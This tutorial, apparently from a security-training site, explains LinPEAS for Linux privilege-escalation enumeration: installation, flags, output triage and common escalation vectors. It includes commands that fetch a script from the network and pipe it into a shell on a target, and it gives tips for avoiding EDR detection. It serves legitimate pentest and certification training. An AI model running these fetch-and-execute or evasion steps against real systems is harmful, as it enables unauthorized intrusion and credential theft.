How to Use LinPEAS: Linux Privilege Escalation Guide

What Is LinPEAS?

LinPEAS is a Linux Privilege Escalation Awesome Script that automates post-exploitation enumeration on Linux hosts. It runs through hundreds of system checks, then prints findings color-coded by likelihood of being exploitable, so the operator can ignore the noise and focus on the wins.

The script lives inside the broader PEASS-ng project, maintained by Carlos Polop and a long list of contributors at github.com/peass-ng/PEASS-ng. PEASS-ng (Privilege Escalation Awesome Scripts Suite, Next Generation) is the actively maintained fork of the original PEASS project, with LinPEAS for Linux, WinPEAS for Windows, and MacPEAS for macOS. The "ng" matters: the legacy carlospolop/privilege-escalation-awesome-scripts-suite repo still ranks highly in search, but the active development is in the PEASS-ng organization.

LinPEAS is the post-exploitation cousin of LinEnum, but it does more, prints more, and prioritizes more aggressively. LinEnum is a useful first read; LinPEAS is what you run when you need a ranked answer in one shot. For OSCP candidates, the practical reality is that LinPEAS is on the exam-time-allowed list of automated tools, and almost everyone runs it as the first step on every Linux machine.

One opinionated take before going further: the loudest critique of LinPEAS is that it is "too noisy." That is true and irrelevant. The script is built so that you ignore the green and pink, scroll to the red-on-yellow, and exfil the full output to a file for review later. Treating LinPEAS output like a normal terminal log is what makes it feel overwhelming. Treat it like a search result page where you only read the top five hits and the noise stops mattering.

How LinPEAS Works

LinPEAS is a single Bash script. When you run it, it executes a long sequence of find, ls, cat, ps, ss, and grep commands against well-known privilege escalation surfaces - filesystem permissions, SUID and SGID binaries, sudo configuration, scheduled tasks, capabilities, kernel version, services exposing local ports, recent files, container indicators, cloud metadata endpoints, and several dozen others.

Two design choices matter. First, LinPEAS is read-only. It does not modify files, install packages, or open outbound connections that are not part of detection (for example, it can fetch the linux-exploit-suggester database, but only when invoked with -a and only over an explicit endpoint). Second, the output is layered. Each finding is tagged with a severity color, and at the very top of the output LinPEAS prints a list of "main vulnerabilities found" - a synthesized triage that points at the few items most likely to win the box.

The script also detects its own context. If you run LinPEAS inside a Docker container, it flags container escape paths (mounted Docker socket, capabilities like CAP_SYS_ADMIN, host filesystem mounts under /host/). Inside an EC2 instance, it queries the metadata service for IAM credentials. Inside a Kubernetes pod, it checks the service account token. Context-aware enumeration matters because the privesc surface is wildly different across these environments.

How to Install LinPEAS

There are three install paths and the right one depends on whether you have outbound network on the target, write access to disk, and a working curl or wget. All three pull from the same upstream release.

Method 1: Direct Download (Most Common)

If the target has outbound network and writable space (/tmp almost always works), pull the latest release directly:

curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh -o /tmp/linpeas.sh
chmod +x /tmp/linpeas.sh
/tmp/linpeas.sh

Use wget if curl is missing: wget -O /tmp/linpeas.sh https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh. Both are commonly present, but stripped containers sometimes have neither - in which case fall back to method 3.

Method 2: Pipe to Shell (No Disk Write)

When you cannot or do not want to drop a file on disk (file integrity monitoring, read-only filesystem, EDR watching /tmp), pipe the download straight into the shell:

curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh

This loses the ability to pass flags directly, so wrap it: curl -L .../linpeas.sh | sh -s -- -a. The -s -- tells sh to read from stdin and pass the rest of the line as arguments to the script.

Method 3: Kali peass-ng Package

On Kali Linux 2024.1 and newer, the PEASS-ng suite ships as a package:

sudo apt install peass-ng
linpeas

Useful for setting up your own attacker box. Less useful in real engagements, since the target rarely has the package installed.

Either way, verify the script before running it on a customer system. Read the script with less /tmp/linpeas.sh and check the SHA against the GitHub release page. The PEASS-ng releases publish SHA256 hashes alongside the binaries; comparing them takes ten seconds and rules out a tampered copy.

Running LinPEAS: Flags That Actually Matter

The -h output lists about twenty flags. In practice, four of them cover 95% of real use:

• -a - all checks. Includes slow checks (linux-exploit-suggester database, brute-force user enumeration, deep file searches). Use this for the OSCP-style "leave it running while I drink coffee" pass.
• -s - stealth and superfast mode. Skips checks that touch noisy areas (recent file discovery, large filesystem walks). Use this when EDR is in scope.
• -q - quiet. Suppresses the banner and the running progress so the output is cleaner for piping into a file.
• -o <sections> - run only specific check categories (for example, SysI,Container,Net). Useful when you already know what you are hunting for.

An honest opinionated note: skip -a on the first run. The default invocation finds 90% of wins faster, and you can always rerun with -a if nothing immediate falls out. The -a flag adds about two minutes of work for findings that are usually duplicates of what the default scan already surfaces.

Save output to a file for review and reporting:

/tmp/linpeas.sh -q | tee /tmp/linpeas.out

The tee approach lets you watch output live and keep a clean copy. For colored output in the saved file (useful when you read the report in an ANSI-aware viewer like less -R), pass --no-color=false implicitly by leaving colors enabled, then read with less -R /tmp/linpeas.out.

Reading LinPEAS Output: Color Codes and Priority

LinPEAS output looks like a wall of text on first read. It is not. The colors encode a priority system, and once you read the legend the output becomes scannable.

• Red text on yellow background - 95%+ confidence privilege escalation. Read these first. Every. Single. Time.
• Red text on no background - finding worth investigating. Probably a privesc vector, but needs context (a writable script that root never executes is not a win).
• Yellow text - "you should probably know about this." Often configuration that matters but is not directly exploitable.
• Light blue / green - informational. Things the system is doing right, or values reported for context. Skip on first read.
• Light cyan / magenta - usernames and active users. Useful for lateral movement targeting, not for privilege escalation directly.

The "Interesting Files" and "Software Information" sections are usually the longest and produce the most green/cyan noise. If you are reading from a saved file, jump straight to the section header that says "Stored credentials? in fish-history files" or "SUID - Check easy privesc, exploits and write perms" - those are where the red-on-yellow lines tend to appear. In a real engagement, the time-saving move is grep -E "$(printf '\\033')\\[1;31;103m" against the colored output to extract only the highest-priority findings:

grep -aE $'\033\\[1;31;103m' /tmp/linpeas.out | head -20

That regex matches the ANSI escape for "red text on yellow background" and pulls out only the lines LinPEAS itself flagged as 95%+ confidence. In practice, this is the line that matters most when triage time is tight.

Top Privilege Escalation Vectors LinPEAS Surfaces

Six categories produce the overwhelming majority of LinPEAS wins on real engagements. Knowing what each looks like in the output speeds up triage.

Sudo NOPASSWD and Sudo Misconfigurations

The sudo -l output is the first thing LinPEAS runs (with the -P <password> flag, if you supply one for the current user). Look for NOPASSWD entries, sudo rules that allow specific binaries (especially anything in the GTFOBins dataset), and env_keep directives that preserve LD_PRELOAD or LD_LIBRARY_PATH. Each of those has a documented escalation pattern.

SUID and SGID Binaries

LinPEAS lists every SUID-root binary on the system and cross-references against GTFOBins entries. Anything matching gets flagged in red. Common live wins: /usr/bin/find with the SUID bit, nmap in interactive mode on legacy boxes, custom binaries with the SUID bit set by accident. Practice spotting and exploiting these in HackerDNA's SUID Privilege Hunter lab.

Cron Jobs and Systemd Timers

Cron entries that run as root and reference writable scripts or wildcard expansions are escalation gold. LinPEAS prints /etc/crontab, the per-user crontabs it can read, the /etc/cron.d/ entries, and the systemd timer list. Check the Matsudo lab for hands-on cron-based escalation practice.

Kernel Version and Public Exploits

With -a, LinPEAS pulls the linux-exploit-suggester database and prints likely kernel exploits for the running version. Useful as a hint, but verify the actual patch level (uname -r tells you the version, not what is patched). Many distros backport security fixes without bumping the version string.

Capabilities

Linux capabilities are a more granular alternative to SUID. A binary with cap_setuid+ep can become root without ever being SUID-root. LinPEAS runs getcap -r / and flags interesting capabilities. The most exploitable one is cap_setuid+ep on Python, Perl, or any scripting interpreter - one line of code becomes a root shell.

Writable Files in Privileged Paths

World-writable files in /etc/, /usr/local/bin/, or any path that root processes execute from are an immediate win. LinPEAS lists these with the world-writable bit highlighted. The MITRE ATT&CK reference for these patterns is the Privilege Escalation tactic, which catalogs the broader technique families LinPEAS detects.

LinPEAS vs WinPEAS: When to Use Which

Same project, different operating systems. LinPEAS is the Linux variant; WinPEAS is the Windows variant, distributed as a precompiled .exe (and a .bat alternative). They share the design philosophy - color-coded enumeration, ranked findings, single-binary deployment - and they share the maintainer (PEASS-ng).

The decision is operating system, not preference. If your target box returns uname -a, run LinPEAS. If systeminfo works, run WinPEAS. The two scripts overlap on portable concepts (process enumeration, scheduled tasks, network listeners) but diverge on platform specifics (Linux capabilities vs Windows token privileges, sudo vs UAC, cron vs scheduled tasks). Practice the Windows side in HackerDNA's Windows Privilege Escalation course - the workflow is parallel but the vectors are different enough that learning one does not give you the other for free.

For the broader question of how PEASS fits next to other tools (LinEnum, pspy, linuxprivchecker), our penetration testing tools roundup walks through the full enumeration toolkit and where each script wins.

Practice Linux Privilege Escalation Hands-On

LinPEAS findings only matter if you can act on them. Reading the output is the first half; chaining a finding into a root shell is the second. The fastest way to build that reflex is to practice on intentionally-vulnerable Linux boxes that mirror real engagement scenarios. HackerDNA's privilege escalation labs run in the browser with no setup, no VPN, and no Docker install. Sign up for the free tier, drop into the Cronpocalypse lab, and run LinPEAS as your first move. Compare what LinPEAS flags against what is actually exploitable. Repeat across the SUID Privilege Hunter and Matsudo labs and you have the muscle memory most OSCP candidates need before exam day.

For the deeper conceptual ground - why each privilege escalation vector exists, how Linux permissions actually work, and what a defender would look for - the Linux Privilege Escalation course covers the full theoretical foundation alongside the labs. The course and labs are linked: every concept in the course has a hands-on exercise.

Legal and Ethical Considerations

• Use LinPEAS only on systems you own, lab environments, or systems explicitly in scope for an authorized engagement.
• Document every command run during a customer engagement. LinPEAS output should go in the report appendix.
• Pull LinPEAS only from the official PEASS-ng GitHub releases. Mirrors and forks have been weaponized in the past.
• Confirm the SHA256 of the script against the upstream release before running on a production system. Five seconds of paranoia is worth it.